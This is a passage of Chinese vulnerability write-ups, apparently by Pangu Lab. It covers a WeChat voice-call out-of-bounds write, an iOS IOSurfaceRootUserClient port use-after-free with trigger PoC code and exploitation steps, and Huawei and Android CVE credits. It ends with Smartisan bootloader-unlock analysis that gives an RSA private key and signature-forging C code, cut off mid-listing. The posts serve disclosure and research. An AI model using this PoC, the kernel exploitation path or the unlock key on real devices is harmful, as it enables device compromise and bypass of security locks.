跳过前期复杂的协商互联流程,我们在已经通过微信语音通话的状态下,微信客户端将收到远端发送来的音频数据。收到的原始数据会被层层分解处理,并根据不同的类型分发到不同的处理函数上。

RecvRtpPacketCng

在收到远端的网络数据后,RTP 数据包将被 RecvRtpPacketCng(__int64 XVEChannel, unsigned int *pData, __int16 len, void *a4) 函数处理,这里的参数 pData内容是语音通话的远端完全可控的。该函数会根据网络包中指定的过不同的代码解析

 switch ( pkType )
  {
    case 0:
      log1(1, "*************  XVEChannel:: pkType == 0x80 \r\n\r\n");
      if ( (unsigned int)UnpacketRTP(
                           (unsigned int **)&pCur,
                           (unsigned int *)&nCodec,
                           &udwTimeStamp,
                           udwSeqNum,
                           &redundantlen,
                           &pDataLength) == -1 )
      {
        log1(1, "\r\nXVEChannel::RecvRtpPacket, UnpacketRTP ERROR,! \r\n");
        v15 = wc_gettimeofday() - v189;
        v16 = "leave RecvRtpPacketCng 3,time in %llu\n";
        goto LABEL_17;
      }
    //...
  }

当pkType类型为7或8时,该网络包的类型为 RTPwithRsMd

      // pcur = pdata+8
      while ( 1 )
      {
        get_subpkttype_and_subpktleft(*v54, pCur, (int *)&sub_pkt_type, &sub_pkt_left);
        log1(1, "subpkttype is %d,subpktleft is %d\r\n", sub_pkt_type, sub_pkt_left);
        LOBYTE(v185) = sub_pkt_left != 0;
        if ( sub_pkt_type == 1 )
          break;
        if ( sub_pkt_type )
          goto LABEL_125;
        v55 = (unsigned int *)operator new(4uLL, (const std::nothrow_t *)&std::nothrow);
        if...
        PacketMeta = v55;
        getSubPacketMetaData(*v54, (_BYTE *)pCur, v55);
        v57 = *PacketMeta;
        v58 = (unsigned __int8)(*PacketMeta >> 16);
        nLen = v58 + ((unsigned __int64)((*PacketMeta >> 24) & 1) << 8);
        v54 = (__int64 *)v179;
        v40 = v189;
        log1(
          4,
          "RecvRtpPacket::pkttype=%d,blocknum=%d,d=%d,f=%d,k=%d,r=%d,symid=%d,symlen_high2bits= %d,symlen_low8bits= %d,len = %d\n",
          *PacketMeta & 3,
          BYTE1(v57),
          (*PacketMeta >> 29) & 3,
          *PacketMeta >> 31,
          (*PacketMeta >> 2) & 7,
          (*PacketMeta >> 5) & 7,
          (*PacketMeta >> 25) & 0xF,
          (*PacketMeta >> 24) & 1,
          v58,
          v58 + ((unsigned __int64)((*PacketMeta >> 24) & 1) << 8));
        RsMdDecProcess(*v54, (unsigned __int8 *)(pCur + 4), nLen, *PacketMeta, udwTimeStamp, udwSeqNum[0], (char)v184);
        pCur += nLen + 4;
        operator delete(PacketMeta);
        v60 = (char)v185;
LABEL_123:
        v53 = XVEChannel;
        if ( !v60 || nCodec == 8 )
          goto LABEL_125;
      }

当网络包头部的 subpkt 解析完成后会调用 ParaseRemoteLostRateParam 函数:

  if ( v62 )
      {
        v63 = v62;
        sub_101078AE4(*v54, (_BYTE *)pCur, v62);
        log1(4, "RecvRtpPacket::pkttype=%d,f=%d,subtype=%d,len = %d\n", *v63 & 3, (*v63 >> 2) & 1, *v63 >> 3, v63[1]);
        v64 = v63[1];
        if ( *v63 <= 7u && (!byte_102A0E985 || !*(_BYTE *)(*(_QWORD *)(XVEChannel + 1800) + 3887LL)) )
        {
          v65 = v60;
          ParaseRemoteLostRateParam(*(_QWORD *)(XVEChannel + 72), (unsigned __int8 *)(pCur + 2), v63[1]); //<<==== [1]
          v185 = (unsigned __int8 *)pCur;
          v67 = (unsigned int)*(__int16 *)(XVEChannel + 46276);
          v60 = v65;
          log1(4, "usSetBitrateFlag:%d,sizeofLen:%d\n", v67, 3LL);
 ...
      }

ParaseRemoteLostRateParam 函数中,根据远端的 pData 中数据设置了XVEChannel+72 处对象的内部数据。通过参数 a2,在 pData 中读取两个字节,并最终设置到 m_RemoteLrParam 和 nFrmCnt 两个成员变量中。

__int64 __fastcall ParaseRemoteLostRateParam(__int64 XVEChannel_72, __int64 a2, unsigned int a3)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  if ( a2 )
  {
    if ( a3 >= 3 )
    {
      v3 = *(unsigned __int8 *)a2;
      v4 = *(unsigned __int8 *)(a2 + 1);
      *(_BYTE *)(XVEChannel_72 + 1660) = v4;    // nFrmCnt
      *(_BYTE *)(XVEChannel_72 + 1659) = v3;    // m_RemoteLrParam k: r: d:
      result = log1(
                 4,
                 "ParaseRemoteLostRateParam:: m_RemoteLrParam k: %d, r: %d, d: %d, nFrmCnt: %d \r\n",
                 v3 & 7,
                 (v3 >> 3) & 7,
                 v3 >> 6,
                 v4);
      ++*(_DWORD *)(XVEChannel_72 + 528);
      *(_DWORD *)(XVEChannel_72 + 1712) = 1;
    }
  }
  return result;
}

DevPutProcessRsMdCng

在接收远端的语音数据的同时,也需要将自己的语音数据通过`XVEChannel`对象发送给远端。

__int64 __fastcall DevPutProcessRsMdCng(__int64 XVEChannel, const void *a2, __int64 a3, unsigned int a4)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v4 = a4;
  nDataLen = (unsigned int)a3;
  v6 = a2;
  v93 = 0;
  v85 = 0;
  log1(
    1,
    "===== Enter DevPutProcessRsMdCng, input len = %d,nCoderFrameLen = %d,m_bFecStatus = %d,bChannelDtxFlag :%d !\r\n",
    a3,
    *(unsigned int *)(XVEChannel + 196),
    *(unsigned __int8 *)(XVEChannel + 208),
    a4);
  XVEChannel_72 = *(_QWORD *)(XVEChannel + 72);
  if ( *(_DWORD *)(XVEChannel_72 + 1712) == 1 )
  {
    readRemoteLrParam(XVEChannel_72, (__int64)&v92);  //<=================== 读取 m_RemoteLrParam 和 nFrmCnt
  }
  else if ( (unsigned int)(*(_DWORD *)(XVEChannel + 1828) - 1) > 1 )
  {
    v92 = 0x20A;
  }
  else
  {
    v92 = 0x301;
  }

在 readRemoteLrParam 函数中,会将刚刚设置的 m_RemoteLrParam 和 nFrmCnt 读取到栈上变量v92中。

char __fastcall readRemoteLrParam(__int64 a1, __int64 a2)
{
  char result; // al
  char v3; // cl
  char v4; // dl

  *(_BYTE *)(a2 + 1) = *(_BYTE *)(a1 + 1660);
  result = *(_BYTE *)(a1 + 1659) & 7;
  v3 = result | *(_BYTE *)a2 & 0xF8;
  *(_BYTE *)a2 = v3;
  v4 = *(_BYTE *)(a1 + 1659) & 0x38;
  *(_BYTE *)a2 = v4 | v3 & 0xC7;
  *(_BYTE *)a2 = *(_BYTE *)(a1 + 1659) & 0xC0 | result | v4;
  return result;
}

在读取`RemoteLostRateParam`到局部变量v92后,需要设置到相应的本地成员变量中

  if ( !*(_DWORD *)(XVEChannel + 392)
    && (unsigned __int8)(HIBYTE(v92) - 1) <= 2u
    && (int)v15 <= *(_DWORD *)(XVEChannel + 384) * (*(int *)(XVEChannel + 196) >> 1) )
  {
    DevPutProcessRsMdCng_SetLocalExpectRSPara(
      *(_QWORD *)(XVEChannel + 72),
      v92 & 7,
      ((unsigned __int8)v92 >> 3) & 7,
      (unsigned __int8)v92 >> 6);
    log1(
      4,
      "DevPutProcessRsMdCng_SetLocalExpectRSPara:: m_iNetworkType = %d,nFrmCnt: %d, k: %d, r: %d, d: %d\n",
      *(unsigned int *)(XVEChannel + 1828),
      HIBYTE(v92),
      v92 & 7,
      ((unsigned __int8)v92 >> 3) & 7,
      (unsigned __int8)v92 >> 6);
    v15 = *(unsigned int *)(XVEChannel + 332);
  }


void __fastcall DevPutProcessRsMdCng_SetLocalExpectRSPara(__int64 XVEChannel_72, char a2, char a3, char a4)
{
  *(_BYTE *)(XVEChannel_72 + 64) = a2;
  *(_BYTE *)(XVEChannel_72 + 65) = a3;
  *(_BYTE *)(XVEChannel_72 + 66) = a4;
}

当数据准备好后将调用函数 CAudioRS::RsMdEncProcessCng,写溢出就发生在这个函数中。

 CAudioRS::RsMdEncProcessCng(
          *(_QWORD *)(XVEChannel + 72),
          *(const void **)(XVEChannel + 312),
          (unsigned int)(*(_DWORD *)(XVEChannel + 400) + *(_DWORD *)(XVEChannel + 384) + 1),
          (__int64)v80,
          &v85,
          *(_DWORD *)(XVEChannel + 356) - v57,
          v76,
          v87 & 1,
          v90 & 1);

当 CAudioRS::RsMdEncProcessCng 刚开始执行时会通过 XVEChannel_72+9 作为 index 写一个 byte.

_int64 __fastcall CAudioRS::RsMdEncProcessCng(__int64 XVEChannel_72, const void *a2, __int64 a3, __int64 a4, int *a5, unsigned int a6, unsigned __int8 a7, unsigned __int8 a8, unsigned __int8 a9)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v9 = a6;
  v10 = a3;
  log1(
    4,
    "Enter CAudioRS::RsMdEncProcessCng,nInLen is %d, uiTimeStamp is %u,m_cEncSourceCountInBlk = %d,m_cEncK = %d,m_cEncR ="
    " %d,bSilencePk = %d,bFirstSilencePk = %d,bCngSend = %d\r\n",
    a3,
    a6,
    (unsigned int)*(char *)(XVEChannel_72 + 9),
    (unsigned int)*(char *)(XVEChannel_72 + 4),
    (unsigned int)*(char *)(XVEChannel_72 + 5),
    a7,
    a8,
    a9);
  *(_DWORD *)(XVEChannel_72 + 16) = v9;
  if...
  *(_BYTE *)(XVEChannel_72 + *(char *)(XVEChannel_72 + 9) + 1668) = a7;
  v11 = RsMdEncQueueSourcePktCng(XVEChannel_72, a2, v10, a7 ^ 1u);

并在 RsMdEncQueueSourcePktCng 函数中 XVEChannel_72 + 9 将做一次自增。

 if ( a4 )
    {
      memcpy(v9, a2, a3);
      *(_DWORD *)(XVEChannel_72 + 568) = (unsigned __int16)((unsigned __int16)*(_DWORD *)XVEChannel_72 << 8) | (unsigned __int8)(32 * *(_BYTE *)(XVEChannel_72 + 5)) | (a3 << 16) & 0x1FF0000 | ((*(_BYTE *)(XVEChannel_72 + 8) & 0xF) << 25) | (4 * *(_BYTE *)(XVEChannel_72 + 4) + 28) & 0x1C | ((*(_BYTE *)(XVEChannel_72 + 6) & 3) << 29);
      v10 = *(_QWORD *)(XVEChannel_72 + 544);
      if ( v10 )
      {
        v11 = *(char *)(XVEChannel_72 + 9);
        if ( v11 <= 31 )
        {
          v12 = 1026 * v11;
          *(_WORD *)(v10 + v12 + 1024) = a3;
          memcpy((void *)(v10 + v12), a2, a3);
          if ( a3 > *(__int16 *)(XVEChannel_72 + 10) )
            *(_WORD *)(XVEChannel_72 + 10) = a3;
        }
      }
    }
    ++*(_BYTE *)(XVEChannel_72 + 9);   //自增
    ++*(_BYTE *)(XVEChannel_72 + 8);
    v13 = 0;
    log1(4, "Exit RsMdEncQueueSourcePktCng Success\r\n");

当 CAudioRS::RsMdEncProcessCng 退出前会根据当前的状态更新成员变量。

    update_data(XVEChannel_72);                           //<=====================[1]
    v13 = *(char *)(XVEChannel_72 + 9);                   
    if ( (_BYTE)v13 == *(_BYTE *)(XVEChannel_72 + 4) )    //<=====================[2]
    {
      while ( v13 > 0 )
      {
        if ( *(_BYTE *)(XVEChannel_72 + v13-- + 1667) != 0 )
        {
          v15 = *(_BYTE *)(XVEChannel_72 + 5);
          v16 = *(_BYTE *)(XVEChannel_72 + 8);
          if ( v15 > 0 )
          {
            v16 += v15;
            *(_BYTE *)(XVEChannel_72 + 8) = v16;
          }
          log1(4, "   bRsCodeG = false,m_cEncCountInBlk = %d", (unsigned int)v16);
          goto LABEL_13;
        }
      }
      if ( *(char *)(XVEChannel_72 + 5) > 0 )
        CAudioRS::RsMdCodeGenerate(XVEChannel_72);
LABEL_13:
      *(_DWORD *)(XVEChannel_72 + 8) = 0;              //<======================[3]
      ++*(_DWORD *)XVEChannel_72;
      *(_BYTE *)(XVEChannel_72 + 12) = 1;
    }

[1] 通过`update_data`根据`LocalExpectRSPara`的值修改成员变量

__int64 __fastcall update_data(__int64 XVEChannel_72)
{
  char v1; // al
  __int16 v2; // cx

  v1 = *(_BYTE *)(XVEChannel_72 + 64);
  if ( (*(_BYTE *)(XVEChannel_72 + 4) != v1
     || *(_BYTE *)(XVEChannel_72 + 5) != *(_BYTE *)(XVEChannel_72 + 65)
     || *(_BYTE *)(XVEChannel_72 + 6) != *(_BYTE *)(XVEChannel_72 + 66))
    && *(_BYTE *)(XVEChannel_72 + 9) == 1 )
  {
    v2 = *(_WORD *)(XVEChannel_72 + 65);     //DevPutProcessRsMdCng_SetLocalExpectRSPara 根据RemoteLrParam设置
    *(_BYTE *)(XVEChannel_72 + 4) = v1;
    *(_WORD *)(XVEChannel_72 + 5) = v2;      //XVEChannel_72+5 写一个word将覆盖到XVEChannel_72+9处
  }
  return 0LL;

[2] 如果XVEChannel_72+9处的值与XVEChannel_72+4处的值相同,则会出发[3]处的代码将XVEChannel_72+9处写0.

因为 XVEChannel_72 + 9 可以根据 pData 中的数据设置成攻击者可控的数据,当 XVEChannel_72 + 9 被设置为大于 XVEChannel_72 + 4 时,就必须一直自增且产生整数溢出后重新与 XVEChannel_72 + 4 相等时, 才能将 XVEChannel_72 + 9清零。

所以 XVEChannel_72 + 9 的取值范围时0-255。又因为` *(_BYTE *)(XVEChannel_72 + *(char *)(XVEChannel_72 + 9) + 1668) = a7;` 使用的是有符号数作为`index`。最终覆盖范围是 `XVEChannel_72+1668`处的`-128`到`127`处超过原本数据结构包含的内存。

触发流程

                              +------------+                         +------------+
                              |   local    |                         |   remote   |
                              +-----+------+                         +------+-----+
                                    |                                       |
                                    |                                       |
                                    | <-----------------------------------+ |
                                    |                                       |
+---------------------------------+ |                                       |
| RecvRtpPacketCng                | |                                       |
+-+-------------------------------+ |                                       |
  |    +--------------------------+ |                                       |
  +--> | ParaseRemoteLostRateParam| |                                       |
       +--------------------------+ |                                       |
                                    |                                       |
                                    |                                       |
                                    |                                       |
+---------------------------------+ |                                       |
| DevPutProcessRsMdCng            | |                                       |
+-+-------------------------------+ |                                       |
  |    +--------------------------+ |                                       |
  +--->+ readRemoteLrParam        | |                                       |
  |    +--------------------------+ |                                       |
  |    +--------------------------+ |                                       |
  +--->+ SetLocalExpectRSPara     | |                                       |
  |    +--------------------------+ |                                       |
  |    +--------------------------+ |                                       |
  +--->+ RsMdEncProcessCng        | |                                       |
       +--------------------------+ |                                       |
                                    |                                       |
                                    |                                       |
                                    |                                       |
                                    |                                       |
  • RecvRtpPacketCng 从网络报文中获取 lrParam
  • DevPutProcessRsMdCng 根据`lrParam 设置 LocalExpectRSPara
  • RsMdEncProcessCng 根据 LocalExpectRSPara 中的参数修改成员变量作为数据修改的index (XVEChannel_72 + 9 )
  • 修改成功后会对index自增并与本地的max值做比较,如果index达到最大值index_max时(`XVEChannel_72 + 4`)将index清零
    • 如果通过远数据端将index设置为大于index_max的情况,则index会一直自增直到发生整数溢出后才能满足index==index_max的条件进入清零的逻辑
    • index在(-128,127)范围内遍历,产生越界写。越界写的范围在 (-128,127)之间。

感谢

要特别感谢 TSRC 的认真负责。他们在我们上报漏洞后对漏洞响应及时,收到报告的次日就确认了漏洞并给出危险评级。并且在后续的漏洞修复与修复版本更新的工作中和我们保持联系。

TimeLine

2019/11/28 发现漏洞

2019/12/02 完成漏洞分析并上报TSRC

2019/12/03 TSRC确认漏洞并修复

2020/03/23 文章发布

Credit:漏洞由盘古实验室黄涛、王铁磊发现和分析。

IOSurfaceRootUserClient Port UAF

漏洞描述

苹果前天发布了iOS 11.2版本(安全更新细节尚未公布),经测试发现此次更新修复了一个沙盒内可以直接利用的内核漏洞。我们团队在去年发现该漏洞,并一直在内部的研究环境中使用该漏洞对手机进行越狱。漏洞存在于IOSurfaceRootUserClient类的调用方法中,可以导致port的UAF。首先我们给出该漏洞触发的POC:

// open user client
CFMutableDictionaryRef matching = IOServiceMatching("IOSurfaceRoot");
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
io_connect_t connect = 0;
IOServiceOpen(service, mach_task_self(), 0, &connect);

// add notification port with same refcon multiple times
mach_port_t port = 0;
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
uint64_t references;
uint64_t input[3] = {0};
input[1] = 1234;  // keep refcon the same value
for (int i=0; i<3; i++)
{
    IOConnectCallAsyncStructMethod(connect, 17, port, &references, 1, input, sizeof(input), NULL, NULL);
}
IOServiceClose(connect);

通过POC代码可以看到漏洞存在于17号调用函数,定位后对其进行逆向分析。该函数会将传入的port、callback、refcon等数据保存起来,以供需要向用户态发送消息时使用。传入的数据大小是0x18,前两个64位数据分别是callback地址和refcon的值。值得注意的是在保存数据前会首先检查相同的refcon是否已经存在,如果存在则认为已经添加过了,会调用releaseAsyncReference64函数释放reference,从而调用iokit_release_port_send释放我们传入的port,并且返回0xE00002C9号错误。

  if ( !a3->asyncReference )
    return 0xE00002C2LL;
  input = (__int64)a3->structureInput;
  reference = (__int64)a3->asyncReference;
  v6 = *(_QWORD *)(a1 + 224);
  v7 = 0xE00002BDLL;
  IORecursiveLockLock_53(*(_QWORD *)(v6 + 264));
  v8 = *(_QWORD *)(v6 + 344);
  if ( v8 )
  {
    // 检查相同refcon的数据是否已经存在
    while ( *(_QWORD *)(v8 + 32) != *(_QWORD *)(input + 8) || *(_QWORD *)(v8 + 88) != a1 )
    {
      v8 = *(_QWORD *)v8;
      if ( !v8 )
        goto LABEL_8;
    }
    IOUserClient::releaseAsyncReference64(reference);
    v7 = 0xE00002C9LL;
  }
  else
  {
    // 分配内存并通过setAsyncReference64初始化,保存port/callback/refcon
LABEL_8:
    v9 = IOMalloc_53(96LL);
    v10 = v9;
    if ( v9 )
    {
      v11 = v6 + 344;
      memset_53((void *)v9, 0, 0x60uLL);
      IOUserClient::setAsyncReference64(v10 + 16, *(_QWORD *)reference, *(_QWORD *)input, *(_QWORD *)(input + 8));
      *(_QWORD *)(v10 + 88) = a1;
      *(_QWORD *)(v10 + 80) = *(_QWORD *)(input + 16);
      v12 = *(_QWORD *)(v6 + 344);
      *(_QWORD *)v10 = *(_QWORD *)(v6 + 344);
      if ( v12 )
        *(_QWORD *)(v12 + 8) = v10;
      else
        *(_QWORD *)(v6 + 352) = v10;
      v7 = 0LL;
      *(_QWORD *)v11 = v10;
      *(_QWORD *)(v10 + 8) = v11;
    }
  }
  IORecursiveLockUnlock_53(*(_QWORD *)(v6 + 264));
  return v7;
}

如果只是单纯分析该函数的行为,并不存在明显的问题,因此需要结合整个代码路径来看。我们知道IOKit是MIG的子系统,因此用户态最终封装一个message后通过mach_msg发送给内核处理并接受返回消息。而通过mach_msg传输一个port,需要发送complex的消息,内核则在copyin消息的时候会把port name翻译成对应的port地址,并增加一个引用。随后把消息交给ipc_kobject_server处理,观察ipc_kobject_server函数的分发处理:

 /*
   * Find the routine to call, and call it
   * to perform the kernel function
   */
  ipc_kmsg_trace_send(request, option);
  {
    ...

    // 调用真正的处理函数,返回结果设置在reply消息内
    (*ptr->routine)(request->ikm_header, reply->ikm_header);

    ...
  }

  // 如果返回的是简单消息,kr被设置为处理函数的返回值
  if (!(reply->ikm_header->msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
     ((mig_reply_error_t *) reply->ikm_header)->RetCode != KERN_SUCCESS)
    kr = ((mig_reply_error_t *) reply->ikm_header)->RetCode;
  else
    kr = KERN_SUCCESS;

  if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
    /*
     *  The server function is responsible for the contents
     *  of the message.  The reply port right is moved
     *  to the reply message, and we have deallocated
     *  the destination port right, so we just need
     *  to free the kmsg.
     */
    // 如果返回成功则简单释放传入消息的内存
    ipc_kmsg_free(request);

  } else {
    /*
     *  The message contents of the request are intact.
     *  Destroy everthing except the reply port right,
     *  which is needed in the reply message.
     */
    // 如果返回错误,则释放传入消息相关的数据(包含port)
    request->ikm_header->msgh_local_port = MACH_PORT_NULL;
    ipc_kmsg_destroy(request);
  }

可以看到如果UserClient的处理函数返回错误,那么上层会调用ipc_kmsg_destroy->ipc_kmsg_clean->ipc_kmsg_clean_body最终释放传入的port和ool内存。此时我们再看IOSurfaceRootUserClient的17号调用,当它返回错误的时候,认为应该由自己去释放这个port而没有考虑到上层的清理代码,导致这个port会被额外释放一次。

利用思路

这是一个典型的port UAF类型的漏洞。我们可以任意创建一个port,通过17号调用释放该port,同时保留用户态的port name指向已经被释放的port地址。典型的利用思路是通过cross zone attack来填充一个虚假的port:

  • 用ool ports来填充,我们可以读取一个port的的真实地址,导致堆地址泄露
  • 用fake clock port来填充,可以猜测内核的基地址
  • 用fake task port来填充,可以实现任意内核读取
  • 用真实的kernel task port来填充,可以直接获取内核port,实现任意内核读写

Mitigations

  • iOS 10.3以后增加了对kernel task port的保护,不过该保护仅仅比较port指向的task是否等于kernel_task,并未对里面的内容进行校验
  • iOS 11以后移除了mach_zone_force_gc的接口来阻止cross zone attack,需要有别的途径能够触发gc

Fix

iOS 11.2中检测到要注册的refcon已经存在后也不会调用releaseAsyncReference64去释放port了。

最后想说*****这次又是被谁撞了 TT

盘古实验室报告三个华为手机安全漏洞获华为致谢

2017年6月15日,华为发布安全预警,公布涉及华为手机的权限控制漏洞,CVE-2017-8216

2017年8月7日,华为再次发布安全预警,公布涉及华为手机的两个漏洞,CVE-2017-8214CVE-2017-8215

盘古实验室安全研究员闻观行独立发现了以上三个漏洞,在第一时间上报给华为,并获得华为的致谢。

CVE-2017-8216

部分华为手机存在一个权限控制安全漏洞。由于对特定进程授权不当,已经获取手机安卓系统root权限的攻击者利用该漏洞可以获取部分用户信息。

CVE-2017-8214

部分华为手机存在一个绕过解锁码校验的安全漏洞。在手机中获得root权限的攻击者可以利用该漏洞绕过解锁码校验,解锁手机bootloader。

CVE-2017-8215

部分华为手机存在一个权限控制安全漏洞。在手机中获得system权限的攻击者可以利用该漏洞绕过解锁码校验,解锁手机bootloader。

参考链接

http://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20170614-01-smartphone-cn

http://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20170807-01-smartphone-cn

盘古实验室报告两个Android安全漏洞获Google致谢

2017年7月5号,Google发布Android安全公告,修复了会影响 Android 设备的安全漏洞。

盘古实验室的安全研究员Ao Wang获得了2个致谢:CVE-2017-0691CVE-2017-0700

CVE-2017-0691

该漏洞为拒绝服务漏洞,影响Android媒体框架,涉及Android 7.1.1, 7.1.2两个版本。

CVE-2017-0700

该漏洞为远程代码执行漏洞,影响Android系统界面,涉及Android 7.1.1,7.1.2两个版本。

参考链接

https://source.android.com/security/bulletin/2017-07-01

利用漏洞解锁锤子T1/2手机的bootloader

关于bootloader锁

Smartisan是手机中为数不多倾心于工业设计和用户体验的。老罗跨界过猛,也难免导致其最初的想法和现实存在差距。bootloader到底锁还是不锁,甚至曾被一个T1用户弄上法庭来质问。

当然,能从认为加锁是对系统的不自信,到后来发现解锁是安全隐患,绝对是个进步(loser口中的打脸)。技术层面来说,究竟T系列手机的bootloader能不能解锁呢?答案是,能。或者说,本来不能,但由于bootloader里存在的两个漏洞,恰好可解。

分析bootloader

正像Smartisan OS本身,其ROM目录结构也是极简的。firmware-update目录下emmc_appsboot.mbn就是bootloader镜像。由于是ELF格式,不需要更多的处理,就能逆向出不错的代码结构。无论是T1还是T2,bootloader的代码差不多,下面的分析选择的是T2的2.6版的ROM。

和很多高通芯片的手机一样,T2的bootloader是基于高通开源的lk。所以参考源码,可以很快梳理出bootloader的执行流程。启动后,根据按键组合,决定是否进入recovery,如果继续留在bootloader模式,就会注册一系列fastboot command,循环等待用户输入,决定下一步动向,如图1。

显然,control_flag为0的话,cmd_table中只有前四条命令被注册,后续命令就都无法使用了。通过观察cmd_table(如图2),可以发现那些真正令人激动的函数(比如oem unlock)都在比较靠后的位置上。

在搞清楚control_flag这个全局标记到底何去何从之前,不如先探探这仅存四条命令的究竟。reboot,reboot-bootloader命令正像他们的名字一样无趣,flash看起来就很有故事了。

执行flash命令时,如果control_flag为0,那就只能写一个名为security的分区。而control_flag为1时,所有其他分区就都可以写了,如图3所示:

联想之前fastboot command注册的过程,control_flag为0时,绝大部分功能无效,且分区不可写,control_flag应该就是is_allow_unlock,即bootloader是否上锁的标记。系统启动时,is_allow_unlock默认置0。当flash了security分区后,is_allow_unlock会有一次赋值操作,并且一旦赋值为1,就会提示解锁成功,如图4所示:

分析到这里基本可以肯定,T2提供了解锁功能,关键是写入security分区的内容是否能够经得住考验。

解锁bootloader

verify_security()函数比较复杂,涉及很多密码学算法的演绎。好在它使用的是openssl的标准库函数,识别起来有章可循。security分区内容采用的是RSA+MD5签名校验。合理的猜测是,官方本来设计的解锁流程其他厂商类似,即用户提交手机的序列号等信息,然后通过unlock时输入厂商给的解锁码(根据序列号计算出来的签名信息),实现解锁。只不过这一次解锁码是通过写入security分区实现输入。

security[128](security分区第128字节)是RSA初始化函数选择的依据,security[129]作为序列号长度。然后factory[5](factory分区的第5字节)起始的序列号作为MD5的计算依据,得到的hash值和security[0-127]签名信息验证的结果做比,相同返回1,否则返回0。这几乎是每个签名验证的都在用的标准化流程,采用的算法成熟,且由openssl实现(难怪发布会几百万门票钱捐给了openssl),基本不会有瑕疵。由于bootloader只存放了公钥e,没有私钥d,手机用户自己是没办法构造出128字节的签名信息的。

不过,由于代码上一些不大不小的问题,我们恰好可以绕过这些限制,构造出和序列号无关的通用解锁码。首先在RSA初始化时,如图5和6,当security[128]为66和67以外的数值时,初始化函数被选择为sub_F924A90。

跟进sub_F924A90后,可以看见图6所示的密钥填充,BN_bin2bn是openssl的库函数,用于将内存中存放的Big-Endian字符数组转化为Bignum类型,方便RSA的内部计算。私钥d填写的是伪数值,但p和q都填写的是真值。侧面说明写这段代码的人不太了解RSA,毕竟其安全性完全依赖于大数分解的NP难,而现在n的两个素数因子p和q都给了,虽然本意是加快计算速度,但私钥d也就因而可以从公钥e推出来了,d=e-1mod (p-1)(q-1),这就导致了第一个逻辑漏洞,用于伪造签名。

接下来,如图7,完成了RSA的初始化以后,会接着从factory分区读取数据:

究竟从factory分区读取多少字节是可控的,由security[129]决定。读取出来正常应该是一串字母开头后接一串数字的序列号,MD5后得到一串16字节的hash。最后利用RSA的公钥验证security[0-127]的128字节签名是否属于hash。

由于security[129]完全可控,就导致了第二个逻辑漏洞。如果该数指定为0,则MD5是针对一个空字符串进行计算的,计算结果总是d41d8cd98f00b204e9800998ecf8427e。所以无论是哪台手机,factory分区内容如何,签名验证将总是针对常量进行。只要构造该常量的签名写入security分区,就能够完成解锁。

为了减少padding,encoding等一系列开发可能造成的不确定性,在生成解锁码时,同样采用openssl的代码实现,示例如下:

#include <stdio.h>

#include <string.h>

#include <openssl/md5.h>

#include <openssl/crypto.h>

#include <openssl/rsa.h>

unsigned char m3_n[128] = {\

0xA4,0x0C, 0x69, 0x70, 0x25, 0x4F, 0x36, 0x49, 0x8E,\

0x83,0x4B, 0x74, 0x9A, 0x75, 0xC9, 0xF4, 0x7F, 0xE5,\

0x62,0xA8, 0xDE, 0x11, 0x13, 0x03, 0x57, 0x89, 0x31,\

0xCB,0x58, 0x84, 0xC8, 0x26, 0xBA, 0x2B, 0x60, 0xB5,\

0xB8, 0xA5, 0xD9, 0xBD, 0x27, 0x48, 0x3D,0x33, 0x38,\

0xA1,0x72, 0x62, 0x64, 0x87, 0x5E, 0x71, 0xF4, 0x1F,\

0xCB,0x68, 0x83, 0x92, 0xEA, 0x4B, 0xFF, 0x06, 0x38,\

0xAF,0xD5, 0x65, 0x55, 0x94, 0x04, 0x91, 0x88, 0xF7,\

0xA4,0x57, 0x72, 0x29, 0xFE, 0xEA, 0xB1, 0x27, 0x25,\

0xC1,0x12, 0x7D, 0x16, 0x6F, 0x13, 0xAF, 0xE2, 0x00,\

0x8D,0x5E, 0xA4, 0x0A, 0xB6, 0xF3, 0x71, 0x97, 0xC0,\

0xB0,0x60, 0xF5, 0x7C, 0x7F, 0xAA, 0xC4, 0x64, 0x20,\

0x3F,0x52, 0x0A, 0xA3, 0xC3, 0xEF, 0x18, 0xB6, 0x45,\

0x7D,0x72, 0x1E, 0xE2, 0x61, 0x0C, 0xD0, 0xD9, 0x1D,\

0xD0,0x5B\

};

unsigned char m3_e[1] = {3};

unsigned char m3_d[128] = {\

0x6d,0x5d,0x9b,0xa0,0x18,0xdf,0x79,0x86,0x5f,0x02,0x32,0x4d,0xbc,0x4e,0x86,0xa2,\

0xff,0xee,0x41,0xc5,0xe9,0x60,0xb7,0x57,0x8f,0xb0,0xcb,0xdc,0xe5,0xad,0xda,0xc4,\

0x7c,0x1c,0xeb,0x23,0xd0,0x6e,0x91,0x28,0xc4,0xda,0xd3,0x77,0x7b,0x16,0x4c,0x41,\

0x98,0x5a,0x3e,0xf6,0xa2,0xbf,0xdc,0xf0,0x57,0xb7,0x46,0xdd,0x54,0xae,0xd0,0x74,\

0x27,0xaa,0xad,0xf9,0xb9,0x33,0x8f,0x29,0x3b,0xf2,0xee,0x97,0x03,0x0b,0x5c,0xfc,\

0x92,0x95,0x6f,0x05,0xcd,0xbf,0x1c,0x77,0x16,0xce,0xd9,0x13,0xfb,0xf2,0x8f,0x74,\

0x09,0xca,0x78,0xf0,0xc7,0x4a,0xc2,0xc5,0xed,0x58,0xc1,0xfa,0xa1,0x6f,0x64,0x26,\

0x73,0x75,0x73,0x97,0x21,0xb4,0x01,0x13,0xad,0xd7,0xd5,0xbc,0x22,0x75,0x00,0xcb,\

};

int main(int argc, char*argv[]) {

MD5_CTX md5ctx;

unsigned chardigest[MD5_DIGEST_LENGTH];

unsigned charsigret[128];

unsigned int siglen;

unsigned chartestdata;

MD5_Init(&md5ctx);

MD5_Update(&md5ctx, &testdata, 0);

MD5_Final(digest, &md5ctx);

RSA *rsa =RSA_new();

rsa->n =BN_bin2bn(m3_n, 128, rsa->n);

rsa->e =BN_bin2bn(m3_e, 1, rsa->e);

rsa->d =BN_bin2bn(m3_d, 128, rsa->d);

